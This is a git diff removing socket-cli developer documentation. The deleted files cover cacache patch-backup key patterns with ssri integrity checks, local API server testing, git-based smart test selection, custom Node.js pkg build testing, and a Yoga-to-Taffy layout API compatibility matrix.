-function hashFilePath(filePath: string): string { - return crypto.createHash('sha256') - .update(filePath) - .digest('hex') - .slice(0, 16) // 16 chars sufficient -} - -// Store backup -async function storeBackup( - uuid: string, - filePath: string, - content: Buffer -): Promise { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - - // Compute integrity using ssri - const integrity = ssri.fromData(content, { algorithms: ['sha256'] }) - - const result = await put(key, content, { - integrity: integrity.toString(), // Pass ssri string to cacache - metadata: { - originalPath: filePath, - uuid, - backedUpAt: new Date().toISOString() - } - }) - - // result.integrity is an ssri Integrity object - return result.integrity.toString() // 'sha256-...' 
-} - -// Retrieve backup -async function retrieveBackup( - uuid: string, - filePath: string -): Promise { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - - const entry = await get(key) - - // entry.integrity is the ssri string - // entry.data is the Buffer - // Cacache automatically validates integrity when retrieving - - return entry.data -} - -// Retrieve with explicit integrity check -async function retrieveBackupWithIntegrity( - uuid: string, - filePath: string, - expectedIntegrity: string -): Promise { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - - // Pass integrity option to cacache.get - // Will throw if integrity doesn't match - const entry = await get(key, { - integrity: expectedIntegrity - }) - - return entry.data -} -``` - -### 2. Patch Download Pattern - -**Format**: `socket:patch:download:` - -**Example**: -``` -socket:patch:download:123e4567-e89b-12d3-a456-426614174000 -``` - -**Usage**: -```typescript -import { put, get, safeGet } from '@socketsecurity/registry/lib/cacache' -import ssri from 'ssri' - -// Store downloaded patch tarball -async function cachePatchDownload( - uuid: string, - tarball: Buffer, - expectedIntegrity?: string -): Promise { - const key = `socket:patch:download:${uuid}` - - // Compute integrity if not provided - const integrity = expectedIntegrity - ? 
ssri.parse(expectedIntegrity) - : ssri.fromData(tarball, { algorithms: ['sha512'] }) - - const result = await put(key, tarball, { - integrity: integrity.toString(), - metadata: { - uuid, - downloadedAt: new Date().toISOString() - } - }) - - return result.integrity.toString() -} - -// Retrieve cached patch (avoid re-download) -async function getCachedPatch( - uuid: string -): Promise { - const key = `socket:patch:download:${uuid}` - - // Use safeGet to avoid throwing if not cached - const entry = await safeGet(key) - - return entry?.data -} - -// Retrieve with integrity verification -async function getCachedPatchWithIntegrity( - uuid: string, - expectedIntegrity: string -): Promise { - const key = `socket:patch:download:${uuid}` - - try { - const entry = await get(key, { - integrity: expectedIntegrity - }) - return entry.data - } catch { - // Not found or integrity mismatch - return undefined - } -} -``` - -## Metadata Storage - -Patch metadata is stored in filesystem (NOT cacache): - -**Location**: `~/.socket/_patches/manifests/.json` - -**Schema**: -```typescript -interface PatchBackupMetadata { - uuid: string - patchedAt: string // ISO timestamp - backups: Record -} -``` - -**Example**: -```json -{ - "uuid": "123e4567-e89b-12d3-a456-426614174000", - "patchedAt": "2025-01-14T12:00:00Z", - "backups": { - "node_modules/lodash/index.js": { - "hash": "sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=", - "size": 12345, - "backedUpAt": "2025-01-14T12:00:00Z", - "originalPath": "node_modules/lodash/index.js" - } - } -} -``` - -## Complete Example: Backup and Restore Flow - -```typescript -import { put, get, remove } from '@socketsecurity/registry/lib/cacache' -import { promises as fs } from 'node:fs' -import { join } from 'node:path' -import ssri from 'ssri' -import crypto from 'node:crypto' - -// Helper to hash file paths -function hashFilePath(filePath: string): string { - return crypto.createHash('sha256') - .update(filePath) - .digest('hex') - .slice(0, 16) -} - 
-// Helper to get metadata file path -function getMetadataPath(uuid: string): string { - const socketHome = process.env.HOME + '/.socket' - return join(socketHome, '_patches', 'manifests', `${uuid}.json`) -} - -// Create backup before patching -async function createBackup( - uuid: string, - filePath: string -): Promise<{ hash: string; size: number }> { - // Read original file - const content = await fs.readFile(filePath) - - // Compute integrity using ssri - const integrity = ssri.fromData(content, { algorithms: ['sha256'] }) - const hash = integrity.toString() - - // Store in cacache - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - await put(key, content, { - integrity: hash, - metadata: { - originalPath: filePath, - uuid, - backedUpAt: new Date().toISOString() - } - }) - - // Read/update metadata file - const metadataPath = getMetadataPath(uuid) - let metadata: any - try { - const data = await fs.readFile(metadataPath, 'utf-8') - metadata = JSON.parse(data) - } catch { - metadata = { - uuid, - patchedAt: new Date().toISOString(), - backups: {} - } - } - - metadata.backups[filePath] = { - hash, - size: content.length, - backedUpAt: new Date().toISOString(), - originalPath: filePath - } - - await fs.mkdir(join(metadataPath, '..'), { recursive: true }) - await fs.writeFile(metadataPath, JSON.stringify(metadata, null, 2)) - - return { hash, size: content.length } -} - -// Restore backup -async function restoreBackup( - uuid: string, - filePath: string -): Promise { - // Read metadata to get hash - const metadataPath = getMetadataPath(uuid) - const data = await fs.readFile(metadataPath, 'utf-8') - const metadata = JSON.parse(data) - - const backup = metadata.backups[filePath] - if (!backup) { - return false - } - - // Retrieve from cacache with integrity check - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - const entry = await get(key, { - integrity: backup.hash // Verify integrity on retrieval - }) - - // Write back to 
original location - await fs.writeFile(filePath, entry.data) - - return true -} - -// Cleanup backups when removing patch -async function cleanupBackups(uuid: string): Promise { - // Read metadata to get all backup keys - const metadataPath = getMetadataPath(uuid) - const data = await fs.readFile(metadataPath, 'utf-8') - const metadata = JSON.parse(data) - - // Remove each backup from cacache - for (const filePath of Object.keys(metadata.backups)) { - const key = `socket:patch:backup:${uuid}:${hashFilePath(filePath)}` - await remove(key) - } - - // Remove metadata file - await fs.unlink(metadataPath) -} -``` - -## Benefits of Using ssri - -1. **Standard Format**: Same format as npm, pnpm, yarn lockfiles -2. **Built-in Validation**: `ssri.checkData()` handles validation -3. **Multiple Algorithms**: Supports sha1, sha256, sha512 -4. **Conversion Utilities**: `fromHex()`, `parse()`, `hexDigest()` -5. **Cacache Integration**: Cacache expects ssri format -6. **Error Handling**: Proper validation and error reporting - -## Integration with Cacache - -Cacache automatically: -- Validates integrity when retrieving with `integrity` option -- Stores content by hash (content-addressable) -- Deduplicates identical content -- Handles concurrent access safely - -## Key Patterns Summary - -| Pattern | Usage | Count per Patch | -|---------|-------|-----------------| -| `socket:patch:backup::` | Original file backups | 1 per file | -| `socket:patch:download:` | Patch tarball cache | 1 per patch | -| `_patches/manifests/.json` | Metadata (filesystem) | 1 per patch | - -**Example Totals**: -- Patch affecting 5 files = 5 backup entries + 1 download entry + 1 metadata file -- 10 patches affecting 3 files each = 30 backup entries + 10 download entries + 10 metadata files diff --git a/docs/testing/local-testing.md b/docs/testing/local-testing.md deleted file mode 100644 index b40d2ae86..000000000 --- a/docs/testing/local-testing.md +++ /dev/null @@ -1,231 +0,0 @@ -# Testing Against Local 
Depscan API Server - -This guide explains how to test socket-cli against a local depscan API server. - -## Quick Start - -### 1. Start the Depscan API Server - -In one terminal: - -```bash -cd ../depscan/workspaces/api-v0 -pnpm test -``` - -The API server will start on `http://localhost:8866`. - -### 2. Configure Socket CLI - -The `.env.local` file is already configured to use the local API server: - -```bash -# In socket-cli directory -cat .env.local -``` - -Should show: -```bash -SOCKET_CLI_API_BASE_URL=http://localhost:8866 -``` - -### 3. Run Socket CLI Commands - -Use the `pnpm s` script which automatically loads `.env.local`: - -```bash -# Check version -pnpm s --version - -# Test patch discover -pnpm s patch discover - -# Create a scan -pnpm s scan create . -``` - -## Alternative Methods - -### Method 1: Export Environment Variable - -```bash -export SOCKET_CLI_API_BASE_URL=http://localhost:8866 -./bin/cli.js patch discover -``` - -### Method 2: Inline Environment Variable - -```bash -SOCKET_CLI_API_BASE_URL=http://localhost:8866 ./bin/cli.js patch discover -``` - -### Method 3: Use Dev Script - -```bash -./scripts/dev-local.sh patch discover -``` - -## Verify Configuration - -Check that the CLI is using the local server: - -```bash -# Should show http://localhost:8866 -pnpm s patch discover --debug -``` - -## Testing the New Patches API - -### Test Free Tier Organization - -```bash -# Set up test API token for a free-tier org -export SOCKET_CLI_API_TOKEN=sktsec_test_free_xxxxx - -# Run patch discover -pnpm s patch discover -``` - -Expected behavior: -- Shows patches with PURL objects -- Displays free CVE fixes -- Shows "Upgrade tier for X additional vulnerabilities" messaging -- Only shows latest patch per PURL - -### Test Enterprise Tier Organization - -```bash -# Set up test API token for an enterprise org -export SOCKET_CLI_API_TOKEN=sktsec_test_enterprise_xxxxx - -# Run patch discover -pnpm s patch discover -``` - -Expected behavior: -- Shows patches 
with PURL objects -- Displays all CVE fixes (free + paid) -- Shows total vulnerability count -- Only shows latest patch per PURL - -## Troubleshooting - -### API Server Not Responding - -Check if the server is running: - -```bash -curl http://localhost:8866/health -``` - -Should return a 200 status. - -### Wrong API Server Being Used - -Verify environment variable: - -```bash -echo $SOCKET_CLI_API_BASE_URL -``` - -If not set, make sure `.env.local` is configured correctly and you're using `pnpm s`. - -### Authentication Errors - -Make sure you have a valid API token: - -```bash -# Check if token is set -echo $SOCKET_CLI_API_TOKEN - -# Or use socket login -pnpm s login -``` - -### Port Already in Use - -If port 8866 is already in use: - -1. Stop the existing process on port 8866 -2. Or change the port in depscan configuration -3. Update `SOCKET_CLI_API_BASE_URL` accordingly - -## Development Workflow - -### Typical Development Flow - -```bash -# Terminal 1: Start depscan API server -cd ../depscan/workspaces/api-v0 -pnpm test - -# Terminal 2: Build and run socket-cli -cd $(pwd) -pnpm run build -pnpm s patch discover - -# After making changes to depscan -# Restart depscan server, no need to rebuild socket-cli - -# After making changes to socket-cli -pnpm run build -pnpm s patch discover -``` - -### Watch Mode for Socket CLI - -Keep socket-cli auto-rebuilding as you make changes: - -```bash -# Terminal 1: Depscan server -cd ../depscan/workspaces/api-v0 -pnpm test - -# Terminal 2: Socket CLI watch mode -cd $(pwd) -pnpm run dev # Alias for build:watch - -# Terminal 3: Test commands -pnpm s patch discover -``` - -## Integration Tests - -Run integration tests against local server: - -```bash -# Start depscan server first (terminal 1) -cd ../depscan/workspaces/api-v0 -pnpm test - -# Run integration tests (terminal 2) -cd $(pwd) -pnpm test:unit test/integration/patches-api.test.mts -``` - -Tests will auto-detect the local server and run, or skip if not available. 
- -## Environment Variables Reference - -| Variable | Description | Example | -|----------|-------------|---------| -| `SOCKET_CLI_API_BASE_URL` | API server URL | `http://localhost:8866` | -| `SOCKET_CLI_API_TOKEN` | API authentication token | `sktsec_test_xxxxx` | -| `SOCKET_CLI_API_PROXY` | HTTP proxy URL | `http://proxy:8080` | -| `SOCKET_CLI_API_TIMEOUT` | Request timeout in ms | `30000` | - -## Tips - -1. **Always start depscan server first** before running socket-cli commands -2. **Use `pnpm s`** for commands to auto-load `.env.local` -3. **Check server logs** in depscan terminal if API calls fail -4. **Use `--debug` flag** for verbose output when troubleshooting -5. **Keep both projects at same level** for easier path references - -## Need Help? - -- Check depscan server logs in terminal 1 -- Verify API endpoint in browser: `http://localhost:8866/health` -- Test API directly with curl before testing CLI -- Check `.env.local` is configured correctly -- Ensure both projects are on compatible versions diff --git a/docs/testing/smart-test-selection.md b/docs/testing/smart-test-selection.md deleted file mode 100644 index 924722184..000000000 --- a/docs/testing/smart-test-selection.md +++ /dev/null @@ -1,339 +0,0 @@ -# Smart Test Selection - -## Overview - -Smart test selection automatically determines which tests to run based on file changes, dramatically improving development iteration speed. - -**Performance impact**: 40-60% faster test runs by executing only affected tests instead of the entire suite. 
- -**When full suite runs**: -- CI environment (`CI=true`) -- Explicit `--all` or `--force` flag -- Config file changes (`vitest.config`, `tsconfig`) -- Core utility file changes -- First-time build or no changes detected - -## How It Works - -### Git Integration - -The test mapper uses git utilities from `@socketsecurity/lib/git` to detect changes: - -```typescript -import { getChangedFilesSync, getStagedFilesSync } from '@socketsecurity/lib/git' - -// Detects files with uncommitted changes -const changed = getChangedFilesSync() - -// Detects files staged for commit -const staged = getStagedFilesSync() -``` - -### File Mapping Rules - -Source files map to test files using pattern matching: - -**Direct mapping** (basename match): -``` -src/commands.mts → test/commands.test.mts -src/flags.mts → test/flags.test.mts -``` - -**Test files run themselves**: -``` -test/utils.mts → test/utils.mts -``` - -**Special mappings** (multi-test impact): -``` -src/package-url.ts → test/package-url.test.mts - → test/integration.test.mts - -src/package-url-builder.ts → test/package-url-builder.test.mts - → test/integration.test.mts -``` - -**Data changes** (integration tests): -``` -data/*.json → test/integration.test.mts - → test/purl-types.test.mts -``` - -### Core Files Detection - -Core utilities trigger full suite execution (affect all code): - -```typescript -const CORE_FILES = [ - 'src/helpers.ts', - 'src/strings.ts', - 'src/constants.ts', - 'src/lang.ts', - 'src/error.ts', - 'src/validate.ts', - 'src/normalize.ts', - 'src/encode.ts', - 'src/decode.ts', - 'src/objects.ts', -] -``` - -**Why**: These files provide foundational utilities used throughout the codebase. Changes here require comprehensive validation. 
- -### Fallback Behavior - -**No test mapping found**: Runs all tests (safer default) -**No changes detected**: Skips tests entirely -**Deleted test files**: Automatically excluded from execution - -## Usage - -### Basic Commands - -```bash -# Run only affected tests (default behavior) -pnpm test - -# Run tests for staged changes only -pnpm test --staged - -# Force full suite execution -pnpm test --all - -# Skip checks for faster iteration -pnpm test --fast - -# Combine flags for staged + fast mode -pnpm test --staged --fast -``` - -### Advanced Usage - -```bash -# Run with coverage for changed tests -pnpm test --coverage - -# Update snapshots for affected tests -pnpm test --update - -# Pass additional vitest arguments -pnpm test -- --reporter=dot - -# Fast mode with coverage -pnpm test --fast --coverage -``` - -### Environment Variables - -```bash -# Force all tests to run -FORCE_TEST=1 pnpm test - -# Simulates CI behavior (always runs full suite) -CI=true pnpm test -``` - -### Example Workflows - -**Feature development**: -```bash -# Edit source file -vi packages/cli/src/commands.mts - -# Run affected tests only -pnpm test --fast - -# Runs: test/commands.test.mts -``` - -**Core utility changes**: -```bash -# Edit core utility -vi packages/cli/src/helpers.ts - -# Automatically runs full suite -pnpm test --fast - -# Reason: Core file changes -``` - -**Testing staged commits**: -```bash -# Stage changes -git add packages/cli/src/flags.mts - -# Test only staged changes -pnpm test --staged --fast - -# Runs: test/flags.test.mts -``` - -## Mapping Rules Reference - -### Source to Test Patterns - -| Source Pattern | Test Pattern | Behavior | -|---------------|--------------|----------| -| `src/*.mts` | `test/*.test.mts` | Direct basename match | -| `src/commands/*.mts` | `test/commands/*.test.mts` | Subdirectory preserved | -| `src/helpers.ts` | All tests | Core file triggers full suite | -| `test/*.test.mts` | Self | Test files run themselves | -| `data/*.json` | 
`test/integration.test.mts` | Data changes run integration | -| `*.config.*` | All tests | Config changes run full suite | - -### File Type Filtering - -Smart selection only processes code files: - -```typescript -const codeExtensions = ['.js', '.mjs', '.cjs', '.ts', '.cts', '.mts', '.json'] -``` - -**Ignored files**: `.md`, `.txt`, `.log`, images, etc. - -## Customization - -### Adding New Mappings - -Edit `/packages/cli/scripts/utils/changed-test-mapper.mjs`: - -```typescript -function mapSourceToTests(filepath) { - // Add custom mapping - if (normalized.includes('src/custom-feature.ts')) { - return ['test/custom-feature.test.mts', 'test/integration.test.mts'] - } - - // Existing mappings... -} -``` - -### Defining Core Files - -Update the `CORE_FILES` array: - -```typescript -const CORE_FILES = [ - 'src/helpers.ts', - 'src/strings.ts', - // Add new core file - 'src/new-core-utility.ts', -] -``` - -### Debugging Mappings - -Add logging to see which tests are selected: - -```typescript -export function getTestsToRun(options = {}) { - const testInfo = /* ... */ - - // Debug output - console.log('Mode:', testInfo.mode) - console.log('Reason:', testInfo.reason) - console.log('Tests:', testInfo.tests) - - return testInfo -} -``` - -Or use verbose vitest output: - -```bash -pnpm test -- --reporter=verbose -``` - -## Architecture - -### Implementation Files - -**Test runner** (`packages/cli/scripts/test.mjs`): -- Orchestrates check → build → test workflow -- Parses command-line flags -- Invokes test mapper - -**Test mapper** (`packages/cli/scripts/utils/changed-test-mapper.mjs`): -- Detects changed/staged files via git -- Maps source files to test files -- Determines full vs. 
selective execution - -**Interactive runner** (`packages/cli/scripts/utils/interactive-runner.mjs`): -- Provides TTY-aware test execution -- Handles Ctrl+O for options menu - -### Data Flow - -``` -User runs: pnpm test --staged - ↓ -scripts/test.mjs parses flags - ↓ -getTestsToRun({ staged: true }) - ↓ -getStagedFilesSync() via git - ↓ -mapSourceToTests() for each file - ↓ -Returns: { tests: ['test/flags.test.mts'], mode: 'staged' } - ↓ -vitest runs: test/flags.test.mts -``` - -### Exit Codes - -- `0` - All tests passed -- `1` - Tests failed or error occurred -- `128+` - Signal termination (SIGINT, SIGTERM) - -## Best Practices - -**During development**: -```bash -# Quick iteration loop -pnpm test --fast # Run checks + affected tests -git add . # Stage changes -pnpm test --staged --fast # Verify staged changes -git commit # Commit with confidence -``` - -**Before push**: -```bash -# Full validation -pnpm test --all # Run entire suite -``` - -**In CI**: -```bash -# Automatic full suite execution (CI=true) -pnpm test -``` - -**Debugging test selection**: -```bash -# See which tests would run without executing -git status # Check changed files -git diff --name-only # List changed file names -``` - -## Troubleshooting - -**Tests not running when expected**: -- Check if file has corresponding test file -- Verify file extension matches code extensions -- Ensure test file exists and isn't deleted - -**Too many tests running**: -- Check if you modified a core file -- Verify config files aren't changed -- Use `--staged` to test only staged changes - -**No tests running**: -- Verify you have uncommitted changes -- Check git status shows modified files -- Use `--all` to force full suite execution - -**Test mapper issues**: -- Review `/packages/cli/scripts/utils/changed-test-mapper.mjs` -- Add console.log statements for debugging -- Check git utilities are working correctly diff --git a/docs/testing/testing-custom-node.md b/docs/testing/testing-custom-node.md deleted file mode 
100644 index cba8bdd7b..000000000 --- a/docs/testing/testing-custom-node.md +++ /dev/null @@ -1,158 +0,0 @@ -# Testing Custom Node.js Build - -## ⚠️ Important Understanding - -The custom Node.js binary built with yao-pkg patches is **NOT meant to be run standalone**. It is specifically designed to be used as a base by `@yao-pkg/pkg` when creating executable bundles. - -### Why Can't We Run It Standalone? - -1. **Always-on SEA mode**: Our Socket modification makes `isSea()` always return `true` -2. **pkg bootstrap**: The binary includes pkg bootstrap code that expects to be wrapped -3. **Intended use**: pkg embeds assets into the binary and sets up the proper environment - -### The Correct Testing Approach - -Test the **complete workflow**: Build → pkg → Test executable - -``` -Custom Node Binary → pkg wraps it → Socket CLI executable → Test that! -``` - -## 🧪 Testing Workflows - -### Option 1: Full Workflow Test (Recommended) - -Test the complete pkg workflow from building Socket CLI to testing the executable: - -```bash -# Build Socket CLI + create pkg executable + test -node scripts/test-pkg-workflow.mjs - -# Skip steps if already done: -node scripts/test-pkg-workflow.mjs --skip-build # Skip pnpm build -node scripts/test-pkg-workflow.mjs --skip-pkg # Skip pkg creation -``` - -**What it tests**: -- Custom Node binary exists in pkg cache -- Socket CLI builds successfully with `pnpm build` -- pkg creates executable using custom Node -- Executable runs and responds to commands - -### Option 2: Manual Testing - -If you prefer to test manually: - -```bash -# 1. Verify custom Node is in cache -ls -lh ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed - -# 2. Build Socket CLI -pnpm run build - -# 3. Create pkg executable -pnpm exec pkg . - -# 4. 
Test the executable -./pkg-binaries/socket-macos-arm64 --version -./pkg-binaries/socket-macos-arm64 --help -./pkg-binaries/socket-macos-arm64 scan --help -``` - -### Option 3: Integration Test - -Run the existing integration test that tests the full pkg workflow: - -```bash -node scripts/test-yao-pkg-integration.mjs -``` - -## ❌ What NOT To Do - -**DO NOT try to run the custom Node binary directly**: - -```bash -# ❌ This will FAIL: -~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed --version - -# ❌ This will also FAIL: -PKG_EXECPATH='' ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed --version -``` - -**Why?** The binary has been modified to always run in SEA mode for pkg compatibility. It's not a general-purpose Node.js binary. - -## 🔍 Verification Steps - -After building the custom Node binary: - -### Step 1: Verify Build -```bash -node scripts/verify-node-build.mjs -``` - -**Note**: This verification has limitations. It tests the source modifications but cannot fully test the binary's standalone functionality (which is expected). - -### Step 2: Test pkg Workflow -```bash -node scripts/test-pkg-workflow.mjs -``` - -This is the **definitive test** that validates the custom Node works correctly with pkg. - -## 📊 What Each Test Validates - -| Test | What It Checks | Pass Criteria | -|------|---------------|---------------| -| `verify-node-build.mjs` | Source modifications, file integrity | ⚠️ Partial (binary tests will fail) | -| `test-pkg-workflow.mjs` | Complete pkg workflow | ✅ Full validation | -| `test-yao-pkg-integration.mjs` | Integration with pkg | ✅ Full validation | - -## 🎯 Success Criteria - -The custom Node.js build is successful when: - -1. ✅ Build completes without errors -2. ✅ Binary is installed to pkg cache (~54MB) -3. ✅ pkg can create executables using it -4. ✅ Socket CLI executable runs correctly -5. ✅ Executable responds to commands (`--version`, `--help`, etc.) 
- -## 🐛 Troubleshooting - -### "Cannot find module" Errors - -If you see errors like: -``` -Error: Cannot find module '--version' -``` - -This means you're trying to run the custom Node binary standalone, which won't work. Use the pkg workflow test instead. - -### pkg Fails to Find Binary - -If pkg can't find the custom Node: - -```bash -# Check if binary exists in cache -ls -lh ~/.pkg-cache/v3.5/ - -# Rebuild if needed -node scripts/build-yao-pkg-node.mjs --clean -``` - -### Executable Crashes or Doesn't Work - -1. Verify the build completed successfully -2. Run verification: `node scripts/verify-node-build.mjs` -3. Check Socket CLI built correctly: `pnpm run build` -4. Try rebuilding everything: `node scripts/build-yao-pkg-node.mjs --clean` - -## 📚 Related Documentation - -- [Build System Overview](./BUILD-SYSTEM-SUMMARY.md) -- [Quick Reference](./node-build-quick-reference.md) -- [Build Improvements](./technical/build-improvements-2025-10-15.md) - ---- - -**Key Takeaway**: The custom Node binary is a **build artifact** for pkg, not a standalone Node.js replacement. Always test via the pkg workflow! diff --git a/docs/yoga-layout/research/api-compatibility.md b/docs/yoga-layout/research/api-compatibility.md deleted file mode 100644 index 7f82e1e80..000000000 --- a/docs/yoga-layout/research/api-compatibility.md +++ /dev/null @@ -1,370 +0,0 @@ -# API Compatibility Matrix - -This document provides a detailed compatibility matrix between Yoga Layout's official API and this Taffy-based implementation. 
- -## Status Legend - -- ✅ **Fully Supported**: Works exactly as Yoga, tested and verified -- ⚠️ **Partial Support**: Implemented but with known limitations or differences -- 🚧 **Planned**: Not yet implemented but technically feasible -- ❌ **Not Supported**: Fundamental limitation, cannot be supported with current Taffy version - -## Node API - -### Tree Management - -| Method | Status | Notes | -|--------|--------|-------| -| `Node.create(config?)` | ✅ | Factory method works, config optional | -| `insertChild(child, index)` | ⚠️ | Taffy appends children; index tracked but may not affect layout order ([src/lib.rs:36-40](src/lib.rs#L36-L40)) | -| `removeChild(child)` | ✅ | Fully supported | -| `getChild(index)` | ✅ | Returns child at index from adapter layer | -| `getChildCount()` | ✅ | Returns correct count | -| `getParent()` | ✅ | Tracked in adapter layer | - -**Reference**: [Yoga Node API](https://yogalayout.dev/docs/api/node) - -### Lifecycle - -| Method | Status | Notes | -|--------|--------|-------| -| `free()` | ✅ | No-op (WASM GC handles memory) ([src/lib.rs:406-409](src/lib.rs#L406-L409)) | -| `freeRecursive()` | ✅ | No-op (WASM GC handles memory) ([src/lib.rs:411-415](src/lib.rs#L411-L415)) | -| `reset()` | ✅ | Resets to default style ([src/lib.rs:417-421](src/lib.rs#L417-L421)) | -| `copyStyle(node)` | ⚠️ | Stub implementation, marks dirty but doesn't copy styles | - -### Layout Calculation - -| Method | Status | Notes | -|--------|--------|-------| -| `calculateLayout(width, height, direction)` | ✅ | Fully supported, undefined becomes MaxContent | -| `markDirty()` | ✅ | Tracked in adapter layer | -| `isDirty()` | ✅ | Tracked in adapter layer | -| `hasNewLayout()` | ✅ | Tracked in adapter layer | -| `markLayoutSeen()` | ✅ | Clears hasNewLayout flag | - -### Layout Getters - -| Method | Status | Notes | -|--------|--------|-------| -| `getComputedLeft()` | ✅ | Maps to Taffy layout.location.x ([src/lib.rs:336-342](src/lib.rs#L336-L342)) | -| 
`getComputedTop()` | ✅ | Maps to Taffy layout.location.y ([src/lib.rs:344-350](src/lib.rs#L344-L350)) | -| `getComputedWidth()` | ✅ | Maps to Taffy layout.size.width ([src/lib.rs:353-360](src/lib.rs#L353-L360)) | -| `getComputedHeight()` | ✅ | Maps to Taffy layout.size.height ([src/lib.rs:362-369](src/lib.rs#L362-L369)) | -| `getComputedRight()` | ✅ | Calculated as left + width ([src/lib.rs:371-378](src/lib.rs#L371-L378)) | -| `getComputedBottom()` | ✅ | Calculated as top + height ([src/lib.rs:380-387](src/lib.rs#L380-L387)) | -| `getComputedLayout()` | ✅ | Returns all computed values as object | -| `getComputedMargin(edge)` | 🚧 | Not yet implemented | -| `getComputedPadding(edge)` | 🚧 | Not yet implemented | -| `getComputedBorder(edge)` | ❌ | Taffy v0.6 doesn't include border in layout | - -### Flexbox Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setFlexDirection(direction)` | ✅ | Enum mapping: Column=0, ColumnReverse=1, Row=2, RowReverse=3 ([src/lib.rs:107-119](src/lib.rs#L107-L119)) | -| `setJustifyContent(justify)` | ✅ | Maps to Taffy JustifyContent ([src/lib.rs:121-136](src/lib.rs#L121-L136)) | -| `setAlignItems(align)` | ✅ | Maps to Taffy AlignItems, SpaceBetween/SpaceAround fallback to Start ([src/lib.rs:138-155](src/lib.rs#L138-L155)) | -| `setAlignContent(align)` | ✅ | Maps to Taffy AlignContent, Baseline fallback to Start ([src/lib.rs:157-174](src/lib.rs#L157-L174)) | -| `setAlignSelf(align)` | ✅ | Maps to Taffy AlignSelf ([src/lib.rs:176-193](src/lib.rs#L176-L193)) | -| `setFlexWrap(wrap)` | ✅ | Maps to Taffy FlexWrap: NoWrap=0, Wrap=1, WrapReverse=2 ([src/lib.rs:195-207](src/lib.rs#L195-L207)) | -| `setFlex(flex)` | ✅ | Sets flexGrow=flex, flexShrink=1, flexBasis=0 ([src/lib.rs:209-217](src/lib.rs#L209-L217)) | -| `setFlexGrow(flexGrow)` | ✅ | Direct mapping to Taffy ([src/lib.rs:219-225](src/lib.rs#L219-L225)) | -| `setFlexShrink(flexShrink)` | ✅ | Direct mapping to Taffy ([src/lib.rs:227-233](src/lib.rs#L227-L233)) | -| 
`setFlexBasis(flexBasis)` | ✅ | Converts to Dimension::Length ([src/lib.rs:235-241](src/lib.rs#L235-L241)) | - -**Reference**: [CSS Flexbox Spec](https://www.w3.org/TR/css-flexbox-1/) - -### Sizing Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setWidth(width)` | ✅ | Converts to Dimension::Length ([src/lib.rs:58-64](src/lib.rs#L58-L64)) | -| `setHeight(height)` | ✅ | Converts to Dimension::Length ([src/lib.rs:66-72](src/lib.rs#L66-L72)) | -| `setMinWidth(minWidth)` | ✅ | Converts to Dimension::Length ([src/lib.rs:74-80](src/lib.rs#L74-L80)) | -| `setMinHeight(minHeight)` | ✅ | Converts to Dimension::Length ([src/lib.rs:82-88](src/lib.rs#L82-L88)) | -| `setMaxWidth(maxWidth)` | ✅ | Converts to Dimension::Length ([src/lib.rs:90-96](src/lib.rs#L90-L96)) | -| `setMaxHeight(maxHeight)` | ✅ | Converts to Dimension::Length ([src/lib.rs:98-104](src/lib.rs#L98-L104)) | -| `setWidthPercent(width)` | 🚧 | Not yet implemented | -| `setHeightPercent(height)` | 🚧 | Not yet implemented | -| `setWidthAuto()` | 🚧 | Not yet implemented | -| `setHeightAuto()` | 🚧 | Not yet implemented | - -### Spacing Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setPadding(edge, padding)` | ✅ | Uses LengthPercentage, supports all edges including Horizontal/Vertical/All shortcuts ([src/lib.rs:243-278](src/lib.rs#L243-L278)) | -| `setPaddingPercent(edge, padding)` | 🚧 | Not yet implemented | -| `setMargin(edge, margin)` | ✅ | Uses LengthPercentageAuto, supports all edges including Horizontal/Vertical/All shortcuts ([src/lib.rs:280-315](src/lib.rs#L280-L315)) | -| `setMarginPercent(edge, margin)` | 🚧 | Not yet implemented | -| `setMarginAuto(edge)` | 🚧 | Not yet implemented | -| `setBorder(edge, border)` | ❌ | Taffy v0.6 doesn't support border in layout calculations | - -**Edge Enum Mapping** ([src/enums.mjs:38-48](src/enums.mjs#L38-L48)): -- Left = 0 -- Top = 1 -- Right = 2 -- Bottom = 3 -- Start = 4 (mapped to Left) -- End = 5 (mapped to Right) 
-- Horizontal = 6 (sets Left + Right) -- Vertical = 7 (sets Top + Bottom) -- All = 8 (sets all four edges) - -### Other Properties - -| Method | Status | Notes | -|--------|--------|-------| -| `setDisplay(display)` | 🚧 | Not yet implemented (Flex=0, None=1) | -| `setPosition(position)` | ❌ | Absolute positioning not supported in Taffy | -| `setPositionType(positionType)` | ❌ | Absolute positioning not supported | -| `setAspectRatio(aspectRatio)` | 🚧 | Not yet implemented | -| `setOverflow(overflow)` | 🚧 | Not yet implemented | -| `setDirection(direction)` | 🚧 | Not yet implemented | -| `setGap(gutter, gap)` | 🚧 | Not yet implemented | - -### Measure Function - -| Method | Status | Notes | -|--------|--------|-------| -| `setMeasureFunc(measureFunc)` | ⚠️ | Stored but not integrated with layout calculations (Taffy limitation) | -| `unsetMeasureFunc()` | ⚠️ | Clears stored function | -| `setDirtiedFunc(dirtiedFunc)` | ✅ | Called when node is marked dirty | - -**Limitation**: Yoga allows custom measure functions for leaf nodes (e.g., measuring text). Taffy doesn't provide this extension point. Measure functions are stored for API compatibility but don't affect layout calculations. - -**Workaround**: Pre-calculate sizes and set them explicitly using `setWidth()`/`setHeight()`. 
